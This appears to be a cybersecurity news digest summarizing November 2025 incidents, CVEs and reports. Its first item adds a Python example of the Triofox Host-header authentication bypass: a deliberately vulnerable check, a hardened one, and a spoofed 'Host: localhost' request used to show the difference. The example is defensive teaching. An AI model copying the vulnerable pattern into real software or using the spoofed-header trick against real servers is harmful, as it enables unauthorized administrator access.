A critical, unauthenticated remote code execution vulnerability (CVE-2025-12480) in Gladinet's Triofox file-sharing platform is being actively exploited by a threat group tracked as UNC6485. The attackers bypass authentication by setting the HTTP Host header to 'localhost', so the application treats the request as coming from the server itself and exposes pages that let them create rogue administrator accounts. They then abuse a built-in antivirus feature to execute malicious code with SYSTEM-level privileges, leading to full system compromise. Post-exploitation activity includes the deployment of commercial remote access tools such as Zoho UEMS and AnyDesk to maintain persistence. Gladinet has released a patch, and organizations are urged to update immediately.

Nov 11, 2025 · 5 min read
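The bypass pattern above is a general one: any server that decides "this request is local" from a header the client wrote is trusting the attacker. The block below is an added example, not Gladinet's code or a description of Triofox internals; it shows a constructed gate for an admin-creation endpoint, first in the vulnerable form (Host header consulted) and then hardened (loopback decided from the TCP peer address, Host checked against an explicit allow-list). The endpoint shape, the allow-list and the addresses are assumptions.

```python
import ipaddress
from typing import Mapping, Set

LOOPBACK_NAMES = {"localhost", "127.0.0.1", "::1"}


def normalise_host(raw: str) -> str:
    """'LocalHost:8080' -> 'localhost', '[::1]:443' -> '::1'."""
    host = raw.strip().lower()
    if host.startswith("["):                      # bracketed IPv6 literal, optional :port
        return host[1:host.find("]")] if "]" in host else host
    return host.split(":", 1)[0]                  # name or IPv4, optional :port


def host_header_is_local(headers: Mapping[str, str]) -> bool:
    """VULNERABLE pattern (constructed illustration): the request is treated as local
    because the client-supplied Host header says so."""
    return normalise_host(headers.get("Host", "")) in LOOPBACK_NAMES


def request_is_local(remote_addr: str, headers: Mapping[str, str], allowed_hosts: Set[str]) -> bool:
    """Hardened check: 'local' is a property of the TCP peer address, which the client
    cannot choose, and Host must additionally match an explicit allow-list."""
    try:
        peer_is_loopback = ipaddress.ip_address(remote_addr).is_loopback
    except ValueError:                            # malformed peer address: fail closed
        return False
    return peer_is_loopback and normalise_host(headers.get("Host", "")) in allowed_hosts


def handle_initial_setup(remote_addr: str, headers: Mapping[str, str], hardened: bool = True) -> int:
    """HTTP status for an admin-creation page meant to be reachable only from the box
    itself (assumed endpoint shape). 200 = form served, 403 = refused."""
    allowed = {"localhost", "127.0.0.1"}
    ok = request_is_local(remote_addr, headers, allowed) if hardened else host_header_is_local(headers)
    return 200 if ok else 403


if __name__ == "__main__":
    spoofed = {"Host": "localhost"}               # what the attacker sends from 203.0.113.5
    print("vulnerable:", handle_initial_setup("203.0.113.5", spoofed, hardened=False))  # 200
    print("hardened:  ", handle_initial_setup("203.0.113.5", spoofed, hardened=True))   # 403
    print("real local:", handle_initial_setup("127.0.0.1", {"Host": "localhost:8080"})) # 200
```

Two caveats. Behind a reverse proxy the peer address is the proxy's, and X-Forwarded-For is just another client-writable header unless the proxy overwrites it, so the "local" decision has to be made at the proxy or the feature removed. And a first-run admin-creation page is safest when it simply stops existing once an administrator has been created, which removes the need for a locality check at all.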

KONNI APT Weaponizes Google's Find Hub for Destructive Attacks

The North Korea-linked threat group KONNI has been observed in a novel campaign targeting individuals in South Korea. The attackers use social engineering to deploy PC malware that steals Google account credentials. With these credentials, they access the victim's Google account and abuse the legitimate 'Find Hub' service (formerly Find My Device) to track the real-time location of the victim's Android phone and remotely trigger a factory reset, wiping all data. This campaign highlights the group's creativity in weaponizing legitimate services for destructive purposes.

Nov 11, 2025 · 5 min read

Pentagon Overhauls Cyber Force Model to Boost USCYBERCOM Readiness

The U.S. Department of War (DoW, the secondary title now used for the Department of Defense) has announced a new cyber force generation model aimed at enhancing the operational effectiveness, specialization, and lethality of forces assigned to U.S. Cyber Command (USCYBERCOM). The revised plan is designed to create a more integrated and agile cyber force by streamlining how personnel are recruited, trained, and retained across all military branches. This strategic shift seeks to address emerging cyber threats and deter aggression in the cyber domain more effectively.

Nov 11, 2025 · 3 min read

Nikkei Slack Breach Exposes Data of 17,000 Users via Stolen Credentials

Japanese media giant Nikkei Inc., owner of the Financial Times, has disclosed a significant data breach affecting its internal Slack workspace. An attacker gained access using authentication credentials stolen from an employee's personal computer, which was infected with infostealer malware. The incident, which was detected in September 2025, exposed the names, email addresses, and chat histories of 17,368 employees and business partners. The breach highlights the persistent threat of infostealer malware and the security risks associated with credentials stored in web browsers.

Nov 11, 2025 · 4 min read

Hyundai IT Affiliate Discloses Major Data Breach Exposing PII and SSNs

Hyundai AutoEver America, the IT services subsidiary of the Hyundai Group, has begun notifying customers of a major data breach that occurred between late February and early March 2025. The incident involved unauthorized access to the company's IT environment, exposing highly sensitive personally identifiable information (PII), including full names, driver's license numbers, and Social Security numbers. While the exact number of victims is unconfirmed, the company's software is used in up to 2.7 million vehicles in North America, indicating a potentially massive scale.

Nov 11, 2025 · 4 min read

Cisco Firewalls Under Renewed Assault as New DoS Attack Variant Emerges

Cisco has issued an urgent security warning about a new denial-of-service (DoS) attack variant that is actively exploiting two previously patched vulnerabilities, CVE-2025-20333 and CVE-2025-20362, in its Secure Firewall ASA and FTD software. The campaign, which began on November 5, 2025, causes unpatched devices to enter a continuous reload loop, rendering them inoperable. This follows months of active exploitation by advanced threat actors, including a compromise of at least one US government agency. Cisco strongly urges all customers to apply the available patches immediately, as no effective workarounds exist.

Nov 11, 2025 · 6 min read

China's Cyber Arsenal Exposed: Knownsec Breach Leaks State Hacking Tools and Global Target Lists

A monumental data breach at Knownsec, a prominent Chinese cybersecurity firm with close government ties, has resulted in the exposure of over 12,000 classified documents. The leak, which occurred in early November 2025, provides an unprecedented view into China's offensive cyber capabilities, revealing a sophisticated arsenal of malware for multiple operating systems, custom hardware attack tools, and an extensive list of global espionage targets. The compromised data details large-scale data theft from countries including India, South Korea, and Taiwan, targeting critical infrastructure, government databases, and telecommunications networks, signaling a major intelligence failure for China's state-sponsored cyber operations.

Nov 10, 2025 · 6 min read

Swedish IT Supplier Breach Exposes Personal Data of 1.5 Million Citizens

The 'Datacarry' ransomware group has claimed responsibility for a major cyberattack on Miljödata, a Swedish IT supplier for local governments, exposing the sensitive personal data of up to 1.5 million people. The attack, which occurred in August 2025, targeted the company's HR systems, leading to the theft of names, government IDs, and contact information. The 224MB data archive was subsequently published on the dark web. The breach has caused service disruptions for numerous Swedish municipalities and affected data from major companies like SAS and Volvo. The incident is now under a national privacy investigation for potential GDPR violations.

Nov 10, 2025 · 5 min read

EU Governments Under Siege: ENISA Reports Massive Surge in DDoS and Data Attacks

A new threat landscape report from the EU Agency for Cybersecurity (ENISA) reveals that public administrations across the European Union are facing a dramatic increase in cyberattacks. DDoS attacks, largely driven by pro-Russia hacktivist groups like NoName057(16), account for 60% of all incidents, primarily targeting central governments. While disruptive, the report warns that data breaches (17.4%) and ransomware (10%) pose a more significant threat to the continuity of essential public services. ENISA also highlights ongoing espionage campaigns by Russian and Chinese state actors, and notes that the sector's immaturity under the new NIS2 Directive places it in a high-risk zone.

Nov 10, 2025 · 5 min read

It's Official: DoD Begins Phased Rollout of CMMC Cybersecurity Program

The U.S. Department of Defense (DoD) has officially started the phased, three-year implementation of its Cybersecurity Maturity Model Certification (CMMC) program as of November 10, 2025. DoD contracting officers can now begin inserting CMMC requirements into new solicitations for the Defense Industrial Base (DIB). The first phase requires contractors handling Federal Contract Information (FCI) or some Controlled Unclassified Information (CUI) to perform self-assessments. More stringent third-party certification requirements for higher CMMC levels will be introduced in subsequent phases, with full implementation expected by late 2028, fundamentally changing the security landscape for all DoD contractors.

Nov 10, 2025 · 4 min read

OWASP Top 10 for 2025 Released, Spotlighting Supply Chain and Design Flaws

The OWASP Foundation has released the 2025 release candidate for its influential Top 10 list of web application security risks. This update signals a major shift in focus, with the introduction of new categories like 'A03: Software Supply Chain Failures' and 'A10: Mishandling of Exceptional Conditions'. 'Broken Access Control' remains the top risk, but 'Security Misconfiguration' has climbed to the number two spot. The 2025 list emphasizes a move away from fixing individual bugs towards addressing systemic root causes like insecure design and dependency management, reflecting the modern threat landscape of complex, interconnected applications.

Nov 10, 2025 · 4 min read

Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

The Akira ransomware group has added U.S. manufacturer Koch & Co., Inc. to its list of victims. In a November 7 post on its dark web leak site, the group claimed to have stolen 54 gigabytes of sensitive corporate data, including detailed financials, contracts, and HR files. Akira is threatening to publish the data if a ransom is not paid. This attack is characteristic of Akira's double-extortion tactics, targeting mid-sized organizations with data exfiltration followed by encryption. Koch & Co. has not yet issued a public statement on the incident.

Nov 10, 2025 · 5 min read

OSCE Guide Urges Unified Cyber-Physical Defense for Critical Infrastructure

The Organization for Security and Cooperation in Europe (OSCE) has published a new technical guide advising governments and operators to adopt a unified approach to securing critical infrastructure. The guide emphasizes the growing convergence of physical and cybersecurity domains, warning that siloed security teams lack a holistic view of modern threats. It highlights how internet-connected Industrial Control Systems (ICS) have expanded the attack surface, making infrastructure vulnerable to remote cyberattacks. The document provides recommendations for integrating intrusion detection, access control, and insider threat management into a single, cohesive security framework.

Nov 10, 2025 · 4 min read

Microsoft 'Whisper Leak' Attack Can Spy on Encrypted AI Chats

Microsoft researchers have discovered a novel side-channel attack method named 'Whisper Leak' that undermines the privacy of encrypted AI chatbot conversations. By analyzing the size and timing of encrypted data packets from streaming Large Language Models (LLMs), a passive network observer can accurately infer the topic of a conversation. The proof-of-concept attack achieved over 98% accuracy against models from OpenAI, Mistral, xAI, and DeepSeek. While major AI providers have already implemented mitigations following a responsible disclosure, the finding exposes a fundamental privacy risk in the architecture of streaming LLMs, particularly for users in sensitive sectors like law and healthcare.

Nov 9, 2025 · 5 min read

Chinese-Made Electric Buses in Europe & Australia Pose Remote Shutdown Risk

Cybersecurity tests conducted in Norway on November 7, 2025, have uncovered a significant security risk in Chinese-manufactured Yutong electric buses, which are widely used across Europe and Australia. The 'Lion Cage' experiment demonstrated that the buses' connected systems could theoretically be accessed and disabled remotely by the manufacturer. The findings have triggered urgent security reviews by public transit authorities in multiple countries, highlighting the growing national security concerns surrounding internet-connected critical infrastructure and potential vulnerabilities in international supply chains.

Nov 9, 2025 · 5 min read

Philippines Lawmakers Push for National Cybersecurity Fund

In the Philippines, Representatives Migz and Luigi Villafuerte have introduced a proposal to create a 'Cybersecurity Risk Management and Mitigation Fund' (CRMMF). This dedicated national fund would provide the government with the necessary resources to prevent and respond to cyberattacks against both public and private sector entities. The proposal comes after recent DDoS attack attempts on local banks and designates 30% of the fund for rapid restoration of critical information infrastructure, signaling a strong political push to enhance the nation's cyber resilience.

Nov 9, 2025 · 4 min read

Critical Container Escape Flaws in runC Threaten Docker & Kubernetes

A security alert issued on November 9, 2025, warns of three new critical vulnerabilities in runC, the low-level container runtime used by Docker, Kubernetes, and other major container platforms. The flaws could allow a malicious actor to execute a 'container escape,' breaking out of the isolated container environment to gain unauthorized access to the underlying host operating system. A successful container escape is a worst-case scenario in cloud-native security, as it would allow an attacker to compromise all other containers on the host. Administrators of all containerized environments are urged to monitor for and apply patches immediately.

Nov 9, 2025 · 5 min read

Pwn2Own Day 1: Hackers Net $522K for 34 Zero-Days in SOHO Devices

The first day of Trend Micro's Pwn2Own Ireland 2025 competition was a resounding success for security researchers, who earned a total of $522,500 for demonstrating 34 unique zero-day vulnerabilities. In a stunning display, every single one of the 17 scheduled attempts against popular SOHO devices—including printers, NAS devices, and smart home products from brands like QNAP, Synology, Canon, and HP—was successful. The highlight was a complex 'SOHO Smashup' that chained eight bugs to compromise a router and a NAS device.

Nov 8, 2025 · 5 min read

Over 75% of Orgs Can't Keep Pace with AI-Powered Attacks, Survey Finds

A new survey from CrowdStrike reveals a stark reality: 76% of global organizations admit they cannot match the speed and sophistication of AI-powered cyberattacks. The 2025 State of Ransomware Survey highlights a dangerous 'confidence illusion,' where leaders believe they are prepared, yet 78% of their organizations were attacked in the past year. With adversaries using AI to accelerate attacks, 89% of security leaders now agree that AI-powered protection is essential to close the widening security gap and defend against modern threats.

Nov 8, 2025 · 5 min read

Malicious VS Code Extension with Ransomware Capabilities Discovered on Official Marketplace

A malicious Visual Studio (VS) Code extension named "susvsex" was discovered on the official VS Code Extension Marketplace. The extension, which appears to have been created with AI assistance, contained overt ransomware capabilities. Upon activation, it was designed to archive a target directory, exfiltrate the ZIP file to a remote server, and then encrypt the original files. The extension also used a private GitHub repository as a command-and-control channel. Although its default target was a test folder, it could easily be modified to target sensitive user data. Microsoft has since removed the extension, which was published on November 5, 2025.

Nov 8, 2025 · 5 min read

Data of Nearly 200,000 Supporters of Hungarian Party TISZA Leaked Online

The personal data of nearly 200,000 supporters of the Hungarian political party TISZA has been leaked and is being widely distributed online. The breach, which occurred in October 2025, originated from the party's "TISZA Világ" service. The compromised dataset, containing 198,500 records, has been added to the Have I Been Pwned service. Exposed information includes supporters' full names, email addresses, phone numbers, physical addresses, and usernames. This incident places affected individuals at significant risk of phishing, fraud, and other malicious targeting.

Nov 8, 2025 · 4 min read

Bahrain Fosters Digital Talent with AI and Cybersecurity Partnership

Bahrain is strengthening its national digital capabilities through a new partnership between Beyon Cyber, a cybersecurity firm, and Bahrain Polytechnic. The two organizations signed a Memorandum of Understanding (MoU) to foster innovation in Artificial Intelligence and cybersecurity. The collaboration aims to develop advanced, AI-driven security solutions and cultivate a skilled local workforce. This strategic initiative is aligned with Bahrain's goal of becoming a regional leader in technology and equipping its next generation of professionals with the skills to tackle modern cybersecurity challenges.

Nov 8, 2025 · 3 min read

Qilin Ransomware Strikes Again, Claiming Victims Across US, France, and Africa

The Qilin ransomware-as-a-service (RaaS) group has had a highly active month, listing numerous new victims on its data leak site. The group has claimed responsibility for attacks against a wide range of organizations in the U.S., France, and Africa. Victims include insurance providers, healthcare authorities, real estate firms, and French municipalities. This follows recent high-profile claims against two Texas electric cooperatives and Volkswagen Group Finance, demonstrating the group's broad targeting and operational capability, supported by resilient bulletproof hosting infrastructure.

Nov 8, 2025 · 5 min read

Cl0p Gang Exploits Oracle EBS Zero-Day in Massive Data Theft Spree

The Cl0p ransomware syndicate, also known as Graceful Spider, is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS). The flaw, which has a CVSS score of 9.8, allows for unauthenticated remote code execution and has been used to steal data from numerous organizations since at least August 2025. The attackers exfiltrated data for weeks before sending extortion demands in late September. In response, Oracle released an emergency patch on October 4, 2025, and CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating a patch deadline for federal agencies.

Nov 7, 2025 · 5 min read

SonicWall Breach Far Worse Than Feared: All Cloud Backup Users' Firewall Configs Stolen

**[SonicWall](https://www.sonicwall.com)** has issued a major update on a September data breach, revealing its impact is far more severe than initially disclosed. The company confirmed that an unauthorized party accessed and exfiltrated firewall configuration backups for **all** customers of its MySonicWall cloud backup service, a stark revision from the initial estimate of less than 5%. The stolen `.EXP` files contain complete firewall configurations, including security rules and encrypted credentials. While the credentials remain encrypted, security experts warn that possession of these files significantly lowers the bar for future targeted attacks. SonicWall, assisted by **[Mandiant](https://www.mandiant.com/)**, is urging all affected customers to reset passwords and follow detailed mitigation guidance.

Nov 7, 2025 · 5 min read

AI-Powered Social Engineering to Become Top Cyber Threat, ISACA Warns

A new report from the global IT association ISACA reveals a major shift in the threat landscape, with IT professionals now believing AI-driven social engineering will be the most significant cyber threat by 2026. The survey of 3,000 professionals found that 63% ranked this emerging threat highest, surpassing ransomware. Critically, the report also highlights a widespread lack of preparedness, with only 13% of organizations feeling 'very prepared' to manage the risks of generative AI, signaling an urgent need for new defense strategies and training.

Nov 7, 2025 · 6 min read

Massive 'I Paid Twice' Phishing Scheme Defrauds Booking.com Hotels and Guests

A sophisticated global phishing campaign named 'I Paid Twice' is targeting hotels on Booking.com and Expedia, compromising their administrative accounts to defraud guests. Since at least April 2025, attackers have been using social engineering and the PureRAT malware to gain access to hotel systems. Once in, they impersonate hotel staff to send fraudulent payment requests to travelers with upcoming reservations, tricking them into paying a second time via a malicious portal. Security firm Sekoia.io, which discovered the operation, reports that the campaign is highly active and has resulted in financial losses for an unknown number of victims.

Nov 7, 2025 · 5 min read

Samsung Zero-Day Exploited in the Wild to Install 'LANDFALL' Android Spyware

A now-patched zero-day vulnerability, CVE-2025-21042, in Samsung Galaxy devices was actively exploited to install a commercial-grade Android spyware known as LANDFALL. Researchers from Palo Alto Networks' Unit 42 discovered that attackers sent malicious DNG image files via WhatsApp to targets in the Middle East. The flaw, an out-of-bounds write in an image processing library, allowed for remote code execution. This incident highlights the growing trend of exploiting mobile image parsing libraries to deliver spyware, echoing similar attacks against Apple devices.

Nov 7, 2025 · 5 min read

State-Backed Hacking Escalates: Russia Targets Ukraine, China Eyes Latin America

A new report from ESET reveals a significant escalation in cyber operations by state-sponsored threat groups from Russia and China between April and September 2025. Russia-aligned groups, notably Sandworm, have accelerated destructive wiper malware attacks against Ukraine's critical infrastructure, including energy and logistics. Simultaneously, China-aligned actors like FamousSparrow have increased espionage activities targeting governmental entities in Latin America, potentially in response to shifting geopolitical dynamics. The report highlights a global landscape of heightened cyber conflict driven by national interests.

Nov 7, 2025 · 6 min read

Patient Sabotage: Malicious NuGet Packages with Time-Delayed ICS Payloads Discovered

Security researchers have discovered nine malicious packages on the NuGet repository, downloaded over 9,400 times, containing hidden, time-delayed sabotage code. One package, 'Sharp7Extend,' was specifically designed to corrupt write operations in industrial control systems (ICS) by silently causing them to fail after a grace period. This could lead to physical damage or production failures. The code was set to trigger on specific dates, some as far in the future as 2028, demonstrating a patient and highly destructive approach to supply chain attacks.

Nov 7, 2025 · 6 min read

Software Supply Chain Attacks Skyrocket to Record High, Driven by Ransomware Gangs

Software supply chain attacks reached an all-time high in October 2025, with 41 claimed incidents, according to a new report from Cyble. This figure is over 30% higher than the previous monthly record. Ransomware groups, particularly Qilin and Akira, are identified as the primary drivers of this trend, responsible for a majority of attacks in 2025. The information technology, finance, and energy sectors are the most heavily targeted, highlighting a strategic shift by attackers to compromise organizations through their trusted third-party suppliers.

Nov 7, 2025 · 5 min read

Amazon Patches High-Severity Flaw in WorkSpaces Linux Client

Amazon Web Services (AWS) has patched a high-severity vulnerability, CVE-2025-12779, in its WorkSpaces client for Linux. The flaw, rated 8.8 CVSS, could allow a local attacker on a shared computer to extract another user's authentication token and gain unauthorized access to their virtual desktop session. The issue affects Linux client versions 2023.0 through 2024.8. AWS has released a patched version and recommends all users upgrade immediately to mitigate the risk.

Nov 7, 2025 · 4 min read

CISA Adds Actively Exploited Control Web Panel RCE Flaw to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical command injection vulnerability in Control Web Panel (CWP), CVE-2025-48703, to its Known Exploited Vulnerabilities (KEV) catalog. The action confirms the flaw is being actively exploited in the wild. The vulnerability allows a remote, unauthenticated attacker to achieve remote code execution (RCE) on servers running the popular Linux web hosting panel. CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by November 25, 2025, and strongly urges all other organizations to remediate it immediately.

Nov 6, 2025 · 5 min read

U.S. Congressional Budget Office Breached by Suspected Foreign Actor

The U.S. Congressional Budget Office (CBO), the nonpartisan agency that provides economic analysis to Congress, confirmed on November 6, 2025, that it suffered a significant cybersecurity breach. The attack is suspected to be the work of a foreign government, raising concerns about espionage and the potential exposure of sensitive, pre-decisional information. Data at risk includes confidential communications between lawmakers and CBO analysts, as well as early drafts of legislative cost analyses. The CBO has taken steps to contain the incident and is investigating the full scope of the compromise.

Nov 6, 2025 · 6 min read

Cisco Warns of New DoS Attacks Actively Exploiting Firewall Flaws

Cisco has issued an urgent warning about a new attack variant actively targeting its Secure Firewall products. Threat actors are chaining two previously disclosed vulnerabilities, CVE-2025-20333 and CVE-2025-20362, to cause a denial-of-service (DoS) condition on unpatched Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) devices. These same flaws were exploited as zero-days in September 2025 and are listed in CISA's KEV catalog. Cisco strongly recommends that all customers immediately upgrade to patched software versions to prevent network outages and potential device compromise.

Nov 6, 2025 · 5 min read

Critical SQL Injection Flaw in Django Framework Puts Web Apps at Risk

The Django project has released urgent security updates to patch a critical SQL injection vulnerability, CVE-2025-64459, rated 9.1 on the CVSS scale. The flaw affects Django versions 4.2, 5.1, 5.2, and the 6.0 beta. It allows an attacker to manipulate database queries by passing a specially crafted dictionary to certain ORM methods, potentially leading to unauthorized data access, modification, or authentication bypass. Due to the widespread use of Django and the low complexity of the attack, developers are strongly urged to upgrade to the patched versions (4.2.26, 5.1.14, 5.2.8) immediately.

Nov 6, 2025 · 5 min read

Washington Post Confirms Breach in Cl0p's Oracle Supply Chain Attack

The Washington Post confirmed on November 6, 2025, that it was a victim of the widespread supply chain attack orchestrated by the Cl0p ransomware gang. The attack exploited a zero-day vulnerability in Oracle's E-Business Suite (EBS), a widely used enterprise software platform. This confirmation came after Cl0p added the newspaper to its dark web leak site, a classic extortion tactic. The incident highlights the significant risk of supply chain attacks, where a single vulnerability in a trusted third-party vendor's software can lead to the compromise of hundreds of high-profile organizations.

Nov 6, 2025 · 6 min read

Zscaler: 239 Malicious Apps on Google Play Downloaded 42 Million Times

A new report from Zscaler's ThreatLabz, published November 5, 2025, reveals a dramatic 67% year-over-year increase in Android malware. Researchers identified 239 malicious applications that successfully bypassed Google Play Store security, amassing a collective 42 million downloads before being removed. These apps often masqueraded as legitimate productivity 'Tools' to trick users. The report also highlights a dangerous trend in attacks against critical infrastructure, with the energy sector seeing a 387% surge in IoT/OT attacks, and significant increases in transportation and healthcare as well.

Nov 6, 2025 · 6 min read

Hackers Hijack Logistics Systems to Orchestrate Physical Cargo Heists

A new and growing form of hybrid crime is targeting the supply chain, where cybercriminals infiltrate freight and logistics companies to facilitate physical cargo theft. According to recent reports, threat actors compromise carrier systems, often using legitimate Remote Monitoring and Management (RMM) tools like ScreenConnect. Once inside, they manipulate digital 'load boards' to bid on and win real shipments. They then reroute the cargo to a location controlled by organized crime partners, leading to the theft of entire truckloads of goods. This trend highlights a critical vulnerability where the digital transformation of the logistics industry is being exploited to cause billions in real-world losses.

Nov 6, 2025 · 6 min read

CISA Adds Actively Exploited Gladinet and CWP Flaws to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws include an information disclosure bug in Gladinet CentreStack/Triofox (CVE-2025-11371) and an OS command injection vulnerability in CWP Control Web Panel (CVE-2025-48703). Under Binding Operational Directive (BOD) 22-01, federal agencies are mandated to patch these vulnerabilities by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to defend against these active threats.

Nov 5, 2025 · 4 min read

CISA Warns of Critical ICS Flaws in Fuji, Delta, and Radiometrics Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released five advisories detailing critical vulnerabilities in Industrial Control Systems (ICS) from Fuji Electric, Survision, Delta Electronics, Radiometrics, and IDIS. The flaws, which include buffer overflows and authentication bypasses with CVSS scores up to 10.0, could allow remote code execution and severe disruption of critical infrastructure in sectors like manufacturing, energy, and aviation. CISA is urging immediate review and mitigation, as successful exploitation could lead to loss of control over industrial processes and, in some cases, create hazardous physical conditions.

Nov 5, 2025 · 5 min read

Swedish IT Firm Breach Exposes Data of 1.5 Million, Sparks GDPR Probe

The Swedish IT services firm Miljödata has suffered a severe data breach, exposing the personal and potentially sensitive information of over 1.5 million people. The incident, which occurred in late August, resulted in the stolen data being published on the darknet. In response, the Swedish Data Protection Authority (IMY) has launched a major investigation under the General Data Protection Regulation (GDPR), targeting both Miljödata and several of its public sector clients, including the City of Gothenburg and Region Västmanland.

Nov 5, 2025 · 4 min read

Identity is the New Perimeter: Stolen Credentials and Over-Privileged Accounts Drive Cloud Breaches

A consensus is forming across the cybersecurity industry: identity is the new security perimeter in the cloud. New reports from ReliaQuest and Amazon Web Services (AWS) reveal that identity-based attacks are the leading driver of cloud security incidents. Key findings show that compromised credentials caused 20% of breaches, while a staggering 99% of cloud identities are 'over-privileged,' possessing excessive permissions. Experts are urging a strategic shift away from network-centric security and towards a 'zero standing privileges' model, where access is granted on a temporary, as-needed basis to mitigate this massive attack surface.

Nov 5, 2025 · 3 min read

Hackers Claim Breach and Full Database Theft from Russian Nuclear Waste Facility 'Radon'

A threat actor has posted on a data leak forum claiming to have breached Radon, a Russian state-owned enterprise responsible for nuclear waste management and operated by the nuclear giant Rosatom. The attackers allege they have stolen the company's entire database, which reportedly includes sensitive test statistics, user IDs, and the personal information of employees. Security experts warn that if the claim is legitimate, the breach poses a severe risk, as the data could be used to forge safety documents, endanger physical safety, or launch sophisticated spear-phishing campaigns against Russia's critical nuclear infrastructure.

Nov 5, 2025 · 4 min read

F5 Hacked by Nation-State Actor; BIG-IP Source Code Stolen

F5 Networks has disclosed a severe security incident involving a 'highly sophisticated nation-state threat actor' that gained long-term access to its development environment. The attackers, suspected to be the Chinese espionage group UNC5221, successfully stole source code for F5's flagship BIG-IP products. While F5 found no evidence of a software supply chain compromise, the theft of these 'digital blueprints' creates a significant risk of future zero-day vulnerabilities. The Australian Cyber Security Centre (ACSC) has issued an urgent advisory, and F5 released a large batch of 44 new vulnerability patches concurrently with the disclosure.

Nov 4, 2025 · 5 min read

Millions of Devs at Risk: Critical RCE Flaw in Popular React Native Package

A critical remote code execution (RCE) vulnerability, CVE-2025-11953, has been discovered in a popular React Native command-line tool, putting millions of developers at risk. The flaw, rated 9.8 on the CVSS scale, exists in the '@react-native-community/cli' NPM package and allows an unauthenticated attacker to execute arbitrary code on a developer's machine by sending a malicious request to the Metro development server. This could lead to source code theft, malware injection, or a full-blown supply chain attack. Meta has released a patch, and developers are strongly urged to update their dependencies.

Nov 4, 2025 · 3 min read

Conti's Ghost: New 'DragonForce' Ransomware Adopts Cartel Model

A new ransomware operation named DragonForce has been identified by security researchers, notable for its use of leaked source code from the infamous Conti ransomware. Instead of a traditional Ransomware-as-a-Service (RaaS) model, DragonForce operates with a 'cartel-like' structure, providing affiliates with a builder to create their own branded ransomware variants. This approach facilitates the rapid proliferation of new threats, with groups like 'Devman' already seen deploying malware created with the DragonForce builder. The core malware retains Conti's technical features, including its encryption scheme and ability to spread via SMB.

Nov 4, 2025 · 4 min read

EU Stress-Tests Cyber Defenses in Large-Scale Crisis Simulation

The European Union has concluded its 2025 'Blueprint Operational Level Exercise' (BlueOLEx), a large-scale simulation designed to test and improve the bloc's collective response to major cybersecurity crises. Hosted in Cyprus with support from the EU's cybersecurity agency, ENISA, the exercise brought together senior officials from all member states to role-play a significant cyber incident affecting critical sectors. The drill was the first to test the new EU Cyber Blueprint, which aims to clarify roles and streamline coordination between national authorities and the European Commission during a cross-border attack.

Nov 4, 2025 · 3 min read

Philippine Police Brace for Coordinated DDoS Attacks on Government Websites

The Philippine National Police (PNP) has mobilized its cybersecurity units and placed them on high alert in anticipation of a potential large-scale distributed denial-of-service (DDoS) campaign targeting government websites. According to intelligence, the attacks are slated to begin on November 5, 2025. The PNP is coordinating with the Department of Information and Communications Technology (DICT) and other national agencies to harden critical digital infrastructure and prepare rapid response teams to mitigate any disruption to public services.

Nov 4, 2025 · 4 min read

US Cyber Threat Sharing Law 'CISA 2015' Expires, Creating Potential Intelligence Gap

The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a foundational U.S. law that provided liability protections to encourage private companies to share cyber threat data with the government, expired on October 1, 2025. Amidst a government shutdown and a block by Senator Rand Paul, lawmakers failed to reauthorize the act. Security and legal experts warn this could have a chilling effect on threat intelligence sharing, with one law firm predicting a potential 80% drop. The lapse creates uncertainty and could hinder national cybersecurity efforts. In response, new legislation, the PACT Act, has been introduced to retroactively restore and extend the protections, but its future is uncertain.

Nov 3, 2025 · 5 min read

Insider Threat Shocker: Cybersecurity Pros Indicted for Wielding ALPHV/BlackCat Ransomware

In a severe breach of trust, two cybersecurity professionals, Ryan Clifford Goldberg and Kevin Tyler Martin, have been indicted for allegedly conducting ALPHV/BlackCat ransomware attacks against at least five U.S. companies. The individuals, who held roles in incident response and ransomware negotiation, are accused of conspiring to extort nearly $1.3 million from a Florida medical company. This case highlights a critical insider threat risk within the cybersecurity industry itself, where trusted professionals abuse their knowledge and access for criminal gain.

Nov 3, 2025 · 4 min read

SK Telecom Profit Plummets 90% Following Massive Data Breach Affecting 27 Million Customers

South Korean telecom giant SK Telecom has reported a catastrophic 90% drop in its Q3 operating profit, directly attributing the loss to the massive costs of a data breach that exposed the personal data of 27 million customers. The breach, which went undetected for nearly three years, involved 25 different malware types and led to a record $96.5 million (134 billion won) fine from regulators. This incident serves as a stark illustration of the severe and tangible financial consequences of long-term cybersecurity failures and inadequate threat detection.

Nov 3, 2025 · 4 min read

China Amends Cybersecurity Law, Massively Increasing Fines and Adding AI Governance Clause

China has passed major amendments to its 2016 Cybersecurity Law, set to take effect on January 1, 2026. The changes dramatically increase financial penalties for non-compliance, raising the maximum fine for Critical Information Infrastructure Operators (CIIOs) tenfold to RMB 10 million (approx. $1.41M) and for non-CIIOs to RMB 2 million. The amendments also introduce a new, general clause on Artificial Intelligence governance, signaling tighter regulatory control over technology and data security within the country.

Nov 3, 2025 · 4 min read

Microsoft Discovers 'SesameOp' Backdoor Using OpenAI API for Covert C2

Microsoft's Detection and Response Team (DART) has discovered a novel backdoor named 'SesameOp' that uniquely uses the OpenAI Assistants API for its command-and-control (C2) communications. Found during an espionage investigation, the malware hides its malicious traffic within legitimate API calls to the OpenAI platform, making it extremely difficult to detect. The attackers also used .NET AppDomainManager injection by compromising Microsoft Visual Studio utilities to achieve persistence.

Nov 3, 2025 · 5 min read

Europe Now #2 Global Ransomware Target, Attacks Accelerating to 24-Hour Deployments

Europe is now the second-largest global target for ransomware, accounting for 22% of all victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report highlights a dramatic increase in attack speed, with groups like SCATTERED SPIDER now able to deploy ransomware in just 24 hours from initial access. The threat is fueled by a thriving initial access broker (IAB) market and escalating geopolitical tensions involving Russian, Chinese, and North Korean state-sponsored actors targeting critical sectors.

